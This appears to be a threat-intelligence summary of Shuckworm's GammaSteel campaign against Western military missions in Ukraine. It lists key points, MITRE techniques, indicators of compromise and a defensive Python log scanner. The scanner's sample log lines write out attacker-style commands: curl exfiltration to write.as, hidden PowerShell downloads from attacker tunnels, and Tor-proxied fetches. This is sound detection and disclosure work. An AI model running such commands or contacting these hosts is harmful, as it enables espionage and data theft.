Shuckworm Targets Foreign Military Mission Based in Ukraine

Shuckworm, a Russia-linked espionage group, continues to target Ukraine, focusing on military missions of Western countries. Using an updated GammaSteel tool, the group has shifted from VBS scripts to PowerShell-based methods and employs various data exfiltration techniques, including leveraging legitimate web services. The campaign demonstrates increased sophistication in data exfiltration methods and obfuscation strategies. Affected: Ukraine, Western military missions

Key points:

  • Shuckworm has continued its focus on Ukraine into 2025, targeting military operations.
  • The initial infection vector was an infected removable drive.
  • GammaSteel, an updated infostealer tool, is being used for data exfiltration.
  • The group employs methods like cURL and Tor for obfuscation and data transfer.
  • There’s a noticeable shift from VBS scripts to PowerShell tools.
  • The campaign includes advanced obfuscation techniques to minimize detection risks.
  • Shuckworm operates on behalf of the Russian Federal Security Service (FSB).
  • The attack chain involves multi-staged infection methods and registry modifications.
  • Exfiltrated information includes usernames, disk serial numbers, and environment details.
  • Attackers utilize legitimate services to disguise their command and control (C&C) communications.

MITRE Techniques:

  • T1068: Exploitation of Privilege Vulnerabilities – Utilization of system vulnerabilities via obfuscated PowerShell commands.
  • T1071.001: Application Layer Protocol: Web Protocols – Data exfiltration through legitimate web services such as write.as, using tools like cURL.
  • T1041: Exfiltration Over Command and Control Channel – Use of HTTP(S) methods to transmit exfiltrated data.
  • T1059.001: Command and Scripting Interpreter: PowerShell – Execution of PowerShell scripts for reconnaissance and exfiltration.
  • T1070: Indicator Removal on Host – Modification of registry keys to hide malicious files and processes.
  • T1027: Obfuscated Files or Information – Deployment of heavily obfuscated scripts to evade detection.

Indicators of Compromise:

  • [URL] hxxps://write.as/api/posts
  • [IP Address] 107.189.19.218
  • [IP Address] 3.73.33.225
  • [Domain] nav-ni-furnished-handy.trycloudflare[.]com
  • [Domain] areas-apps-civic-loving.trycloudflare[.]com
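As an added example (not code from Symantec's report), a small Python scan over constructed process-creation log lines that flags curl/PowerShell activity contacting the indicators listed above, or showing the trycloudflare-tunnel and Tor/SOCKS-proxy behaviour the summary describes; the pipe-separated log layout and the sample lines are assumptions made for this example.

```python
import re
from typing import List, NamedTuple, Optional

# Indicators from the IoC list on this page, refanged for matching.
IOC_DOMAINS = {"write.as", "nav-ni-furnished-handy.trycloudflare.com",
               "areas-apps-civic-loving.trycloudflare.com"}
IOC_IPS = {"107.189.19.218", "3.73.33.225"}
INTERPRETERS = {"curl.exe", "powershell.exe", "pwsh.exe"}

# Assumed (hypothetical) log layout: timestamp|host|image path|command line
SAMPLE_LOG = [  # constructed sample lines, not real telemetry
    "2025-04-01T10:01:02Z|WS01|C:\\Windows\\System32\\curl.exe|curl.exe -s -X POST hxxps://write.as/api/posts -d @note.txt",
    "2025-04-01T10:02:10Z|WS01|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -w hidden Invoke-WebRequest https://nav-ni-furnished-handy.trycloudflare[.]com/u",
    "2025-04-01T10:03:44Z|WS02|C:\\Tools\\curl.exe|curl.exe --proxy socks5h://127.0.0.1:9050 http://3.73.33.225/ -o c.bin",
    "2025-04-01T10:04:00Z|WS03|C:\\Tools\\curl.exe|curl.exe https://updates.example.com/manifest.json",
    "2025-04-01T10:05:30Z|WS03|C:\\Program Files\\Git\\mingw64\\bin\\curl.exe|curl.exe https://some-other-words.trycloudflare.com/x",
]

class Hit(NamedTuple):
    host: str
    image: str
    reason: str

_URL_RE = re.compile(r"https?://([^/\s:'\"]+)", re.I)
_IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

def refang(text: str) -> str:
    # Normalise defanged notation so listed and live forms both match.
    return text.replace("[.]", ".").replace("hxxp", "http")

def inspect_line(line: str) -> Optional[Hit]:
    _ts, host, image, cmd = [p.strip() for p in line.split("|", 3)]
    cmd = refang(cmd)
    base = image.lower().rsplit("\\", 1)[-1]
    hosts = {h.lower() for h in _URL_RE.findall(cmd)}
    for h in hosts:  # exact IoC domain, or a subdomain of one
        for d in IOC_DOMAINS:
            if h == d or h.endswith("." + d):
                return Hit(host, base, f"contacts IoC domain {d}")
    for ip in sorted(set(_IP_RE.findall(cmd)) & IOC_IPS):
        return Hit(host, base, f"contacts IoC address {ip}")
    if base in INTERPRETERS:  # behavioural fallback for unlisted infrastructure
        if any(h.endswith(".trycloudflare.com") for h in hosts):
            return Hit(host, base, "contacts a trycloudflare tunnel host")
        if re.search(r"socks5h?://|\.onion\b", cmd, re.I):
            return Hit(host, base, "routes traffic through a SOCKS/Tor proxy")
    return None

def scan(lines: List[str]) -> List[Hit]:
    # One Hit per suspicious line; benign lines are dropped.
    return [h for h in map(inspect_line, lines) if h]
```

Running `scan(SAMPLE_LOG)` yields four hits: the write.as post, the listed trycloudflare domain, the IoC address reached via a SOCKS proxy, and the unlisted trycloudflare host; the plain update fetch is not flagged.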


Full Story: https://symantec-enterprise-blogs.security.com/threat-intelligence/shuckworm-ukraine-gammasteel
